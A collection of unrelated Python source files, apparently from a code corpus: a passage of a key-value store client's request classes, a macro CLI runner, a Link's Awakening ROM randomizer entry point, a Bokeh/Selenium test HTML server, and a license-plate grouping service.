self.prefix = prefix
self._validate()
@property
def _is_prefix(self):
return self.prefix is not None
@property
def _is_range(self):
return self.start is not None or self.end is not None
def _validate(self):
self._check_is_type('start', str, nullable=True)
self._check_is_type('end', str, nullable=True)
self._check_is_type('prefix', str, nullable=True)
if self._is_prefix and self._is_range:
raise ValueError("Cannot specify `prefix` and `start`/`end`")
def __repr__(self):
typ = type(self).__name__
if self._is_prefix:
return '%s(prefix=%r)' % (typ, self.prefix)
return ('%s(start=%r, end=%r)'
% (typ, self.start, self.end))
def _build_operation(self):
self._validate()
if self._is_prefix:
return _proto.GetRangeRequest(start=self.prefix,
end=_next_key(self.prefix),
result_type=self._result_type)
return _proto.GetRangeRequest(start=self.start,
end=self.end,
result_type=self._result_type)
@_register_op('int')
class count(_CountOrKeys):
"""A request to count keys in the key-value store.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no
lower bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no
upper bound will be used.
prefix : str, optional
If provided, will count the number keys matching this prefix.
"""
__slots__ = ('start', 'end', 'prefix')
_result_type = 'NONE'
def _build_result(self, result):
return result.count
@_register_op('list of keys')
class list_keys(_CountOrKeys):
"""A request to get a list of keys in the key-value store.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no
lower bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no
upper bound will be used.
prefix : str, optional
If provided, will return all keys matching this prefix.
"""
__slots__ = ('start', 'end', 'prefix')
_result_type = 'KEYS'
def _build_result(self, result):
return [kv.key for kv in result.result]
class _GetOrPop(Operation):
"""Base class for get & pop"""
__slots__ = ()
def __init__(self, key, default=None, return_owner=False):
self.key = key
self.default = default
self.return_owner = return_owner
self._validate()
def _validate(self):
self._check_is_type('key', str)
self._check_is_type('default', bytes, nullable=True)
self._check_is_type('return_owner', bool)
def __repr__(self):
return ('%s(%r, default=%r, return_owner=%r)'
% (type(self).__name__, self.key, self.default,
self.return_owner))
def _build_operation(self):
self._validate()
return self._proto(start=self.key,
end=self.key + '\x00',
result_type='ITEMS')
def _build_result(self, result):
if result.count == 0:
if self.return_owner:
return ValueOwnerPair(self.default, None)
return self.default
if self.return_owner:
return _value_owner_pair(result.result[0])
return result.result[0].value
@_register_op('bytes or ValueOwnerPair')
class get(_GetOrPop):
"""A request to get the value associated with a single key.
Parameters
----------
key : str
The key to get.
default : bytes or None, optional
Default value to return if the key is not present.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('key', 'default', 'return_owner')
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
@_register_op('bytes or ValueOwnerPair')
class pop(_GetOrPop):
"""A request to remove a single key and return its corresponding value.
Parameters
----------
key : str
The key to pop.
default : bytes or None, optional
Default value to return if the key is not present.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('key', 'default', 'return_owner')
_proto = _proto.DeleteRangeRequest
_rpc = 'DeleteRange'
def _output_to_ordered_dict(result, return_owner=False):
if return_owner:
return _OrderedDict((kv.key, _value_owner_pair(kv))
for kv in result.result)
return _OrderedDict((kv.key, kv.value) for kv in result.result)
class _GetOrPopPrefix(Operation):
"""Base class for (get/pop)_prefix"""
__slots__ = ()
def __init__(self, prefix, return_owner=False):
self.prefix = prefix
self.return_owner = return_owner
self._validate()
def _validate(self):
self._check_is_type('prefix', str)
self._check_is_type('return_owner', bool)
def __repr__(self):
return ('%s(%r, return_owner=%r)'
% (type(self).__name__, self.prefix, self.return_owner))
def _build_operation(self):
self._validate()
return self._proto(start=self.prefix,
end=_next_key(self.prefix),
result_type='ITEMS')
def _build_result(self, result):
return _output_to_ordered_dict(result, self.return_owner)
@_register_op('OrderedDict')
class get_prefix(_GetOrPopPrefix):
"""A request to get all key-value pairs whose keys start with ``prefix``.
Parameters
----------
prefix : str
The key prefix.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('prefix', 'return_owner')
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
@_register_op('OrderedDict')
class pop_prefix(_GetOrPopPrefix):
"""A request to remove all key-value pairs whose keys start with ``prefix``,
and return their corresponding values.
Parameters
----------
prefix : str
The key prefix.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('prefix', 'return_owner')
_proto = _proto.DeleteRangeRequest
_rpc = 'DeleteRange'
class _GetOrPopRange(Operation):
"""Base class for (get/pop)_prefix"""
__slots__ = ()
def __init__(self, start=None, end=None, return_owner=False):
self.start = start
self.end = end
self.return_owner = return_owner
self._validate()
def _validate(self):
self._check_is_type('start', str, nullable=True)
self._check_is_type('end', str, nullable=True)
self._check_is_type('return_owner', bool)
def __repr__(self):
return ('%s(start=%r, end=%r, return_owner=%r)'
% (type(self).__name__, self.start, self.end,
self.return_owner))
def _build_operation(self):
self._validate()
return self._proto(start=self.start,
end=self.end,
result_type='ITEMS')
def _build_result(self, result):
return _output_to_ordered_dict(result, self.return_owner)
@_register_op('OrderedDict')
class get_range(_GetOrPopRange):
"""A request to get a range of keys.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no lower
bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no upper
bound will be used.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('start', 'end', 'return_owner')
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
@_register_op('OrderedDict')
class pop_range(_GetOrPopRange):
"""A request to remove a range of keys and return their corresponding values.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no lower
bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no upper
bound will be used.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('start', 'end', 'return_owner')
_proto = _proto.DeleteRangeRequest
_rpc = 'DeleteRange'
class _ExistsMissingDiscard(Operation):
"""Base class for exists, missing & discard"""
__slots__ = ()
def __init__(self, key):
self.key = key
self._validate()
def _validate(self):
self._check_is_type('key', str)
def __repr__(self):
return '%s(%r)' % (type(self).__name__, self.key)
def _build_operation(self):
self._validate()
return self._proto(start=self.key,
end=self.key + '\x00',
result_type='NONE')
def _build_result(self, result):
return result.count == 1
@_register_op('bool')
class exists(_ExistsMissingDiscard, Condition):
"""A request to check if a key exists in the key-value store.
Parameters
----------
key : str
The key to check the presence of.
"""
__slots__ = ('key',)
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
def _build_condition(self):
self._validate()
return _proto.Condition(key=self.key,
operator='NOT_EQUAL',
field='VALUE',
value=None)
@_register_op('bool')
class missing(_ExistsMissingDiscard, Condition):
"""A request to check if a key is not in the key-value store.
This is the inverse of ``exists``.
Parameters
----------
key : str
The key to check the absence of.
"""
__slots__ = ('key',)
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
def _build_result(self, result):
return result.count == 0
def _build_condition(self):
self._validate()
return _proto.Condition(key=self.key,
operator='EQUAL',
field='VALUE',
value=None)
@_register_op('bool')
class discard(_ExistsMissingDiscard):
"""A request to discard a single key.
Returns true if the key was present, false otherwise.
Parameters
----------
key : str
The key to discard.
"""
__slots__ = ('key',)
_proto = _proto.DeleteRangeRequest
_rpc = 'DeleteRange'
def _build_discard_result(result, return_keys=False):
if return_keys:
return [kv.key for kv in result.result]
return result.count
@_register_op('int or list of keys')
class discard_prefix(Operation):
"""A request to discard all key-value pairs whose keys start with ``prefix``.
Returns either the number of keys discarded or a list of those keys,
depending on the value of ``return_keys``.
Parameters
----------
prefix : str
The key prefix.
return_keys : bool, optional
If True, the discarded keys will be returned instead of their count.
Default is False.
"""
__slots__ = ('prefix', 'return_keys')
_rpc = 'DeleteRange'
def __init__(self, prefix, return_keys=False):
self.prefix = prefix
self.return_keys = return_keys
self._validate()
def _validate(self):
self._check_is_type('prefix', str)
self._check_is_type('return_keys', bool)
def __repr__(self):
return ('discard_prefix(%r, return_keys=%r)' %
(self.prefix, self.return_keys))
def _build_operation(self):
self._validate()
result_type = 'KEYS' if self.return_keys else 'NONE'
return _proto.DeleteRangeRequest(start=self.prefix,
end=_next_key(self.prefix),
result_type=result_type)
def _build_result(self, result):
return _build_discard_result(result, self.return_keys)
@_register_op('int or list of keys')
class discard_range(Operation):
"""A request to discard a range of keys.
Returns either the number of keys discarded or a list of those keys,
depending on the value of ``return_keys``.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no lower
bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no upper
bound will be used.
return_keys : bool, optional
If True, the discarded keys will be returned instead of their count.
Default is False.
"""
__slots__ = ('start', 'end', 'return_keys')
_rpc = 'DeleteRange'
def __init__(self, start=None, end=None, return_keys=False):
self.start = start
self.end = end
self.return_keys = return_keys
self._validate()
def _validate(self):
self._check_is_type('start', str, nullable=True)
self._check_is_type('end', str, nullable=True)
self._check_is_type('return_keys', bool)
def __repr__(self):
return ('discard_range(start=%r, end=%r, return_keys=%r)'
% (self.start, self.end, self.return_keys))
def _build_operation(self):
self._validate()
result_type = 'KEYS' if self.return_keys else 'NONE'
return _proto.DeleteRangeRequest(start=self.start,
end=self.end,
result_type=result_type)
def _build_result(self, result):
return _build_discard_result(result, self.return_keys)
class _PutOrSwap(Operation):
"""Shared base class between put and swap"""
__slots__ = ()
_rpc = 'PutKey'
@property
def owner(self):
return self._owner
@owner.setter
def owner(self, owner):
if owner is _no_change:
self._owner_proto = None
self._owner = _no_change
elif owner is None:
self._owner_proto = self._owner = None
elif isinstance(owner, str):
# do this before setting owner to nice python owner,
# ensures validity check is performed beforehand
self._owner_proto = _container_instance_from_string(owner)
self._owner = owner
else:
raise TypeError("owner must be a string or None")
def _validate(self):
self._check_is_type('key', str)
if self.value is _no_change and self.owner is _no_change:
raise ValueError("Must specify 'value', 'owner', or both")
if self.value is not _no_change:
self._check_is_type('value', bytes)
def _build_operation(self):
self._validate()
ignore_value = self.value is _no_change
value = None if ignore_value else self.value
ignore_owner = self.owner is _no_change
owner = self._owner_proto
return _proto.PutKeyRequest(key=self.key,
ignore_value=ignore_value,
value=value,
ignore_owner=ignore_owner,
owner=owner,
return_previous=self._return_previous)
@_register_op()
class put(_PutOrSwap):
"""A request to assign a value and/or owner for a single key.
Parameters
----------
key : str
The key to put.
value : bytes, optional
The value to put. Default is to leave value unchanged;
an error will be raised if the key doesn't exist.
owner : str or None, optional
The container id to claim ownership. Provide ``None`` to set to
no owner. Default is to leave value unchanged.
"""
__slots__ = ('key', 'value', '_owner', '_owner_proto')
_params = ('key', 'value', 'owner')
_return_previous = False
def __init__(self, key, value=_no_change, owner=_no_change):
self.key = key
self.value = value
self.owner = owner
self._validate()
def __repr__(self):
return ('put(%r, value=%r, owner=%r)'
% (self.key, self.value, self.owner))
def _build_result(self, result):
return None
@_register_op('bytes or ValueOwnerPair')
class swap(_PutOrSwap):
"""A request to assign a new value and/or owner for a single key, and
return the previous value.
Parameters
----------
key : str
The key to put.
value : bytes, optional
The value to put. Default is to leave value unchanged;
an error will be raised if the key doesn't exist.
owner : str or None, optional
The container id to claim ownership. Provide ``None`` to set to
no owner. Default is to leave value unchanged.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('key', 'value', 'return_owner', '_owner', '_owner_proto')
_params = ('key', 'value', 'owner', 'return_owner')
_return_previous = True
def __init__(self, key, value=_no_change, owner=_no_change,
return_owner=False):
self.key = key
self.value = value
self.owner = owner
self.return_owner = return_owner
self._validate()
def __repr__(self):
return ('swap(%r, value=%r, owner=%r, return_owner=%r)'
% (self.key, self.value, self.owner, self.return_owner))
def _build_result(self, result):
if result.HasField("previous"):
if self.return_owner:
return _value_owner_pair(result.previous)
return result.previous.value
return ValueOwnerPair(None, None) if self.return_owner else None
|
cli_main.py
|
from threading import Thread, Event
from copy import copy
import json
import queue
from Macro import SetNext, Elements, Bases, get_working_area
# Run only in cli mode, not for gui.
# Will refactor UI to CLI once complete.
test_loc = 'Sequence_Sample/discoveryI.json'
def loadJson(location: str):
if location is None:
raise FileNotFoundError('No Such File')
with open(location) as file: # not needed in CPython, but else all.
baked = json.load(file)
return baked
class MacroCLI:
def __init__(self):
self.loaded = []
self.event = Event()
self.started = False
self.area = None
self.kill_key = 'f2'
self.thread_queue = queue.SimpleQueue()
self.base = Bases.Base.env_var
self.base.event = self.event
def clear_macro(self):
self.loaded.clear()
def set_env_variable(self):
area = get_working_area(self.event, self.kill_key)
self.base.screen_area = area
def load_macro(self, location=None):
self.clear_macro()
if location is None:
location = input()
try:
loaded = loadJson(location)
except FileNotFoundError:
print("└ No such file.")
except UnicodeDecodeError:
print("└ Unicode decode failed.")
except json.JSONDecodeError:
print("└ Failed decoding JSON.")
else:
# maybe I need to wrap this with another try-except
deserialized = Elements.Deserializer(loaded)
self.loaded = deserialized
def list_macro(self, verbose=False):
if verbose:
for i in self.loaded:
print(i)
else:
for i in self.loaded:
print(i.name)
def stop_macro(self):
self.event.set()
def run_macro(self):
if not self.loaded:
print("[W] No macros loaded.")
return
self.set_env_variable()
running = copy(self.loaded)
SetNext(running)
thread = Thread(target=self._runThread, args=[running])
thread.start()
@staticmethod
def _runThread(seq):
head = seq[0]
for element in head:
element.run()
|
main.py
|
import binascii
from romTables import ROMWithTables
import shlex
import randomizer
import logic
import spoilerLog
import re
from argparse import ArgumentParser, ArgumentTypeError
def goal(goal):
if goal == "random":
goal = "-1-8"
elif goal in ["seashells", "raft", "bingo", "bingo-full"]:
return goal
m = re.match(r'^(-?\d|open)(?:-(\d))?$', goal)
if not m:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (open, 0, 1, 2 ... 8), a range (open-6, 1-4, 5-8, ...) or 'seashells' / 'raft'.")
start = m.group(1)
if start == "open":
start = "-1"
start = int(start)
end = m.group(2) or start
end = int(end)
if start < -1 or start > 8 or end < -1 or end > 8:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
if end == start:
return start
elif end < start:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
return range(start, end+1)
# Check if the current mix of options is valid, and fix incompatible selected options
def validateOptions(options):
def req(setting, value, message):
if getattr(options, setting) != value:
print("Warning: %s (setting adjusted automatically)" % message)
setattr(options, setting, value)
def dis(setting, value, new_value, message):
if getattr(options, setting) == value:
print("Warning: %s (setting adjusted automatically)" % message)
setattr(options, setting, new_value)
if options.goal in ("bingo", "bingo-full"):
req("overworld", "normal", "Bingo goal does not work with dungeondive")
req("accessibility_rule", "all", "Bingo goal needs 'all' accessibility")
dis("steal", "never", "default", "With bingo goal, stealing should be allowed")
dis("boss", "random", "shuffle", "With bingo goal, bosses need to be on normal or shuffle")
dis("miniboss", "random", "shuffle", "With bingo goal, minibosses need to be on normal or shuffle")
if options.overworld == "dungeondive":
dis("goal", "seashells", "8", "Dungeon dive does not work with seashell goal")
def main(mainargs=None):
import argparse
import sys
parser = argparse.ArgumentParser(description='Randomize!')
parser.add_argument('input_filename', metavar='input rom', type=str,
help="Rom file to use as input.")
parser.add_argument('-o', '--output', dest="output_filename", metavar='output rom', type=str, required=False,
help="Output filename to use. If not specified [seed].gbc is used.")
parser.add_argument('--dump', dest="dump", type=str, nargs="*",
help="Dump the logic of the given rom (spoilers!)")
parser.add_argument('--spoilerformat', dest="spoilerformat", choices=["none", "console", "text", "json"], default="none",
help="Sets the output format for the generated seed's spoiler log")
parser.add_argument('--spoilerfilename', dest="spoiler_filename", type=str, required=False,
help="Output filename to use for the spoiler log. If not specified, LADXR_[seed].txt/json is used.")
parser.add_argument('--test', dest="test", action="store_true",
help="Test the logic of the given rom, without showing anything.")
parser.add_argument('-s', '--seed', dest="seed", type=str, required=False,
help="Generate the specified seed")
parser.add_argument('--romdebugmode', dest="romdebugmode", action="store_true",
help="Patch the rom so that debug mode is enabled, this creates a default save with most items and unlocks some debug features.")
parser.add_argument('--exportmap', dest="exportmap", action="store_true",
help="Export the map (many graphical mistakes)")
parser.add_argument('--emptyplan', dest="emptyplan", type=str, required=False,
help="Write an unfilled plan file")
parser.add_argument('--timeout', type=float, required=False,
help="Timeout generating the seed after the specified number of seconds")
parser.add_argument('--logdirectory', dest="log_directory", type=str, required=False,
help="Directory to write the JSON log file. Generated independently from the spoiler log and omitted by default.")
# Flags that effect gameplay
parser.add_argument('--plan', dest="plan", metavar='plandomizer', type=str, required=False,
help="Read an item placement plan")
parser.add_argument('--race', dest="race", nargs="?", default=False, const=True,
help="Enable race mode. This generates a rom from which the spoiler log cannot be dumped and the seed cannot be extracted.")
parser.add_argument('--logic', dest="logic", choices=["casual", "normal", "hard", "glitched", "hell"],
help="Which level of logic is required.")
parser.add_argument('--multiworld', dest="multiworld", type=int, required=False,
help="Generates multiple roms for a multiworld setup.")
parser.add_argument('--multiworld-config', dest="multiworld_config", action="append", required=False,
help="Set configuration for a multiworld player, supply multiple times for settings per player")
parser.add_argument('--forwardfactor', dest="forwardfactor", type=float, required=False,
help="Forward item weight adjustment factor, lower values generate more rear heavy seeds while higher values generate front heavy seeds. Default is 0.5.")
parser.add_argument('--heartpiece', dest="heartpiece", action="store_true",
help="Enables randomization of heart pieces.")
parser.add_argument('--seashells', dest="seashells", action="store_true",
help="Enables seashells mode, which randomizes the secret sea shells hiding in the ground/trees. (chest are always randomized)")
parser.add_argument('--heartcontainers', dest="heartcontainers", action="store_true",
help="Enables heartcontainer mode, which randomizes the heart containers dropped by bosses.")
parser.add_argument('--instruments', dest="instruments", action="store_true",
help="Shuffle the instruments in the item pool.")
parser.add_argument('--owlstatues', dest="owlstatues", choices=['none', 'dungeon', 'overworld', 'both'], default='none',
help="Give the owl statues in dungeons or on the overworld items as well, instead of showing the normal hints")
parser.add_argument('--dungeon-items', dest="dungeon_items", choices=['standard', 'localkeys', 'localnightmarekey', 'smallkeys', 'keysanity', 'keysy'], default='standard',
help="Sets what gets done with dungeon items, if they are in their own dungeon or not.")
parser.add_argument('--randomstartlocation', dest="randomstartlocation", action="store_true",
help="Place your starting house at a random location.")
parser.add_argument('--dungeonshuffle', dest="dungeonshuffle", action="store_true",
help="Enable dungeon shuffle, puts dungeons on different spots.")
parser.add_argument('--entranceshuffle', dest="entranceshuffle", choices=["none", "simple", "advanced", "expert", "insanity"], default="none",
help="Enable entrance shuffle, shuffles around overworld entrances.")
parser.add_argument('--boss', dest="boss", choices=["default", "shuffle", "random"], default="default",
help="Enable boss shuffle, swaps around dungeon bosses.")
parser.add_argument('--miniboss', dest="miniboss", choices=["default", "shuffle", "random"], default="default",
help="Shuffle the minibosses or just randomize them.")
parser.add_argument('--doubletrouble', dest="doubletrouble", action="store_true",
help="Warning, bugged in various ways")
parser.add_argument('--witch', dest="witch", action="store_true",
help="Enables witch and toadstool in the item pool.")
parser.add_argument('--hpmode', dest="hpmode", choices=['default', 'inverted', '1', 'low', 'extralow'], default='default',
help="Set the HP gamplay mode. Inverted causes health containers to take HP instead of give it and you start with more health. 1 sets your starting health to just 1 hearth.")
parser.add_argument('--boomerang', dest="boomerang", choices=['default', 'trade', 'gift'], default='default',
help="Put the boomerang and the trade with the boomerang in the item pool")
parser.add_argument('--steal', dest="steal", choices=['never', 'always', 'default'], default='always',
help="Configure when to allow stealing from the shop.")
parser.add_argument('--hard-mode', dest="hardMode", choices=["none", "oracle", "hero", "ohko"], default="none",
help="Make the game a bit harder. [oracle] less health from drops, bombs damage yourself, and less iframes. [hero] Double damage, no heart/fairy drops. [ohko] One hit KO.")
parser.add_argument('--superweapons', dest="superweapons", action="store_true",
help="Make all weapons/inventory more powerful.")
parser.add_argument('--goal', dest="goal", type=goal, default='8',
help="Configure the instrument goal for this rom: any number between -1 (open egg) and 8, a range (e.g. 4-7), 'random', or 'raft' / 'seashells' / 'bingo' for special goals.")
parser.add_argument('--accessibility', dest="accessibility_rule", choices=['all', 'goal'],
help="Switches between making sure all locations are reachable or only the goal is reachable")
parser.add_argument('--bowwow', dest="bowwow", choices=['normal', 'always', 'swordless'], default='normal',
help="Enables 'good boy mode', where BowWow is allowed on all screens and can damage bosses and more enemies.")
parser.add_argument('--pool', dest="itempool", choices=['normal', 'casual', 'pain', 'keyup'], default='normal',
help="Sets up different item pools, for easier or harder gameplay.")
parser.add_argument('--overworld', dest="overworld", choices=['normal', 'dungeondive'], default='normal',
help="Allows switching to the dungeondive overworld, where there are only dungeons.")
parser.add_argument('--pymod', dest="pymod", action='append',
help="Load python code mods.")
# Just aestetic flags
parser.add_argument('--gfxmod', dest="gfxmod", action='append',
help="Load graphical mods.")
parser.add_argument('--remove-flashing-lights', dest="removeFlashingLights", action="store_true",
help="Remove the flashing light effects from mamu, the shopkeeper and madbatter.")
parser.add_argument('--quickswap', dest="quickswap", choices=['none', 'a', 'b'], default='none',
help="Configure quickswap for A or B button (select key swaps, no longer opens map)")
parser.add_argument('--textmode', dest="textmode", choices=['default', 'fast', 'none'], default='default',
help="Default just keeps text normal, fast makes text appear twice as fast, and none removes all text from the game.")
parser.add_argument('--nag-messages', dest="removeNagMessages", action="store_false",
help="Enable the nag messages on touching stones and crystals. By default they are removed.")
parser.add_argument('--lowhpbeep', dest="lowhpbeep", choices=['default', 'slow', 'none'], default='slow',
help="Slows or disables the low health beeping sound")
parser.add_argument('--linkspalette', dest="linkspalette", type=int, default=None,
help="Force the palette of link")
parser.add_argument('--music', dest="music", choices=['default', 'random', 'off'], default='default',
help="Randomizes or disable the music")
args = parser.parse_args(mainargs)
validateOptions(args)
if args.multiworld is not None:
args.multiworld_options = [args] * args.multiworld
if args.multiworld_config is not None:
for index, settings_string in enumerate(args.multiworld_config):
args.multiworld_options[index] = parser.parse_args([args.input_filename] + shlex.split(settings_string),
namespace=argparse.Namespace(**vars(args)))
validateOptions(args.multiworld_options[index])
if args.timeout is not None:
import threading
import time
import os
def timeoutFunction():
time.sleep(args.timeout)
print("TIMEOUT")
sys.stdout.flush()
os._exit(1)
threading.Thread(target=timeoutFunction, daemon=True).start()
if args.exportmap:
import mapexport
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
mapexport.MapExport(rom)
sys.exit(0)
if args.emptyplan:
import locations.items
f = open(args.emptyplan, "wt")
f.write(";Plandomizer data\n;Items: %s\n" % (", ".join(map(lambda n: getattr(locations.items, n), filter(lambda n: not n.startswith("__"), dir(locations.items))))))
f.write(";Modify the item pool:\n")
f.write(";Pool:SWORD:+5\n")
f.write(";Pool:RUPEES_50:-5\n")
import worldSetup
iteminfo_list = logic.Logic(args, world_setup=worldSetup.WorldSetup()).iteminfo_list
for ii in sorted(iteminfo_list, key=lambda n: (n.location.dungeon if n.location.dungeon else -1, repr(n.metadata))):
if len(ii.OPTIONS) > 1:
f.write(";%r\n" % (ii.metadata))
f.write("Location:%s: \n" % (ii.nameId))
sys.exit(0)
if args.dump is not None or args.test:
print("Loading: %s" % (args.input_filename))
roms = [ROMWithTables(f) for f in [args.input_filename] + args.dump]
if args.spoilerformat == "none":
args.spoilerformat = "console"
try:
log = spoilerLog.SpoilerLog(args, roms)
log.output(args.spoiler_filename)
sys.exit(0)
except spoilerLog.RaceRomException:
print("Cannot read spoiler log for race rom")
sys.exit(1)
userSeed = None
if args.seed:
try:
userSeed = binascii.unhexlify(args.seed)
except binascii.Error:
userSeed = args.seed.encode("ascii")
retry_count = 0
while True:
try:
r = randomizer.Randomizer(args, seed=userSeed)
seed = binascii.hexlify(r.seed).decode("ascii").upper()
break
except randomizer.Error:
if userSeed is not None:
print("Specified seed does not produce a valid result.")
sys.exit(1)
retry_count += 1
if retry_count > 100:
print("Randomization keeps failing, abort!")
sys.exit(1)
print("Failed, trying again: %d" % (retry_count))
print("Seed: %s" % (seed))
if __name__ == "__main__":
main()
|
file_server.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Define a simple web server for testing purpose.
Used for serves the testing html pages that are needed by the webdriver unit
tests.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from http.server import BaseHTTPRequestHandler, HTTPServer
from io import open
import os
import socket
import threading
from urllib.request import URLopener
# External imports
import pytest
# Bokeh imports
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 8000
HTML_ROOT = os.path.dirname(__file__)
WEBDRIVER = os.environ.get('WEBDRIVER', "<undefined>")
__all__ = (
'file_server',
'HtmlOnlyHandler',
'SimpleWebServer',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class HtmlOnlyHandler(BaseHTTPRequestHandler):
"""Http handler."""
def do_GET(self):
"""GET method handler."""
try:
path = self.path[1:].split('?')[0]
html = open(os.path.join(HTML_ROOT, path), 'r', encoding='latin-1')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(html.read().encode('utf-8'))
html.close()
except IOError:
self.send_error(404, 'File Not Found: %s' % path)
def log_message(self, format, *args):
"""Override default to avoid trashing stderr"""
pass
class SimpleWebServer(object):
"""A very basic web server."""
def __init__(self, host=DEFAULT_HOST, port=DEFAULT_PORT):
self.stop_serving = False
host = host
port = port
while True:
try:
self.server = HTTPServer(
(host, port), HtmlOnlyHandler)
self.host = host
self.port = port
break
except socket.error:
log.debug("port %d is in use, trying to next one" % port)
port += 1
self.thread = threading.Thread(target=self._run_web_server)
def _run_web_server(self):
"""Runs the server loop."""
log.debug("web server started")
while not self.stop_serving:
self.server.handle_request()
self.server.server_close()
def start(self):
"""Starts the server."""
self.thread.start()
def stop(self):
"""Stops the server."""
self.stop_serving = True
try:
# This is to force stop the server loop
URLopener().open("http://%s:%d" % (self.host, self.port))
except IOError:
pass
log.info("Shutting down the webserver")
self.thread.join()
def where_is(self, path):
return "http://%s:%d/%s" % (self.host, self.port, path)
@pytest.fixture(scope='session')
def file_server(request):
server = SimpleWebServer()
server.start()
request.addfinalizer(server.stop)
return server
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
_html_root_error_message = "Can't find 'common_web' directory, try setting WEBDRIVER environment variable WEBDRIVER:" + WEBDRIVER + " HTML_ROOT:" + HTML_ROOT
if not os.path.isdir(HTML_ROOT):
log.error(_html_root_error_message)
assert 0, _html_root_error_message
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Taken from
# https://github.com/SeleniumHQ/selenium/blob/52e9d6407248bce5de2b6a73103a50bb0e670c1f/py/test/selenium/webdriver/common/webserver.py
# with small modifications
|
license_plate_service.py
|
# license plate service class
from threading import Thread
from get_system_uptime import get_system_uptime
import copy
class licensePlateService:
def __init__(self, detection_box_reference, db_reference):
self.detection_box_reference = detection_box_reference
self.db_reference = db_reference
self.stopped = False
self.notified = False
self.ordered_license_plate_list = []
self.groups_list = []
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
while True:
if self.stopped:
return
if self.notified:
# this means that a new license plate has been added to the list
# time to sort and place that new plate
self.notified = False
# copy contents in to a buffer and flush the original buffer
temp_license_plate_list = self.detection_box_reference.license_plate_list
self.detection_box_reference.license_plate_list = []
# use licensePlateList like a buffer of new data to be actively sorted into a new ordered list
# order based on time stamp
temp_license_plate_list.sort(key=lambda x: x.time_spotted)
# add ordered list to total list, merge
self.ordered_license_plate_list += temp_license_plate_list
# ordered list based on time, separate into groups based on time difference
time_differential_indexes = [] # time differential index list, difference between [i+1] - [i]
min_time_differential = 3 # seconds, should be variable, the time differential between sequential plates time spotted, 3 is good time
max_wait_time = 10 # seconds, should be variable, the time differential between time spotted and system time
for i in range(len(self.ordered_license_plate_list)):
# check if last element in list
if i == len(self.ordered_license_plate_list)-1:
break
difference = self.ordered_license_plate_list[i+1].time_spotted - self.ordered_license_plate_list[i].time_spotted
if difference >= min_time_differential:
time_differential_indexes.append(i)
# find system difference with the LAST plate in the list. operate if self.orderedLicensePlateList is not empty
if len(self.ordered_license_plate_list) != 0:
system_difference = get_system_uptime() - self.ordered_license_plate_list[len(self.ordered_license_plate_list)-1].time_spotted
if system_difference >= max_wait_time:
time_differential_indexes.append((len(self.ordered_license_plate_list)-1))
groups = [] # groupings of indexes, grouped by time differentials calculated above
last_index = 0
for index in time_differential_indexes:
group = range(last_index, index + 1)
last_index = index + 1
groups.append(group)
# groups is a list of ranges, use them to remove plates from orderedList and put them in a list inside of self.groups list
index_decrement = 0 # everytime a plate is deleted, indexDecrement goes up one. This combats the index shift that occurs in a list of changing size
for group in groups:
temp_plate_group = []
for index in group:
plate = self.ordered_license_plate_list[index - index_decrement]
index_decrement += 1
temp_plate_group.append(plate)
self.ordered_license_plate_list.remove(plate)
self.groups_list.append(temp_plate_group)
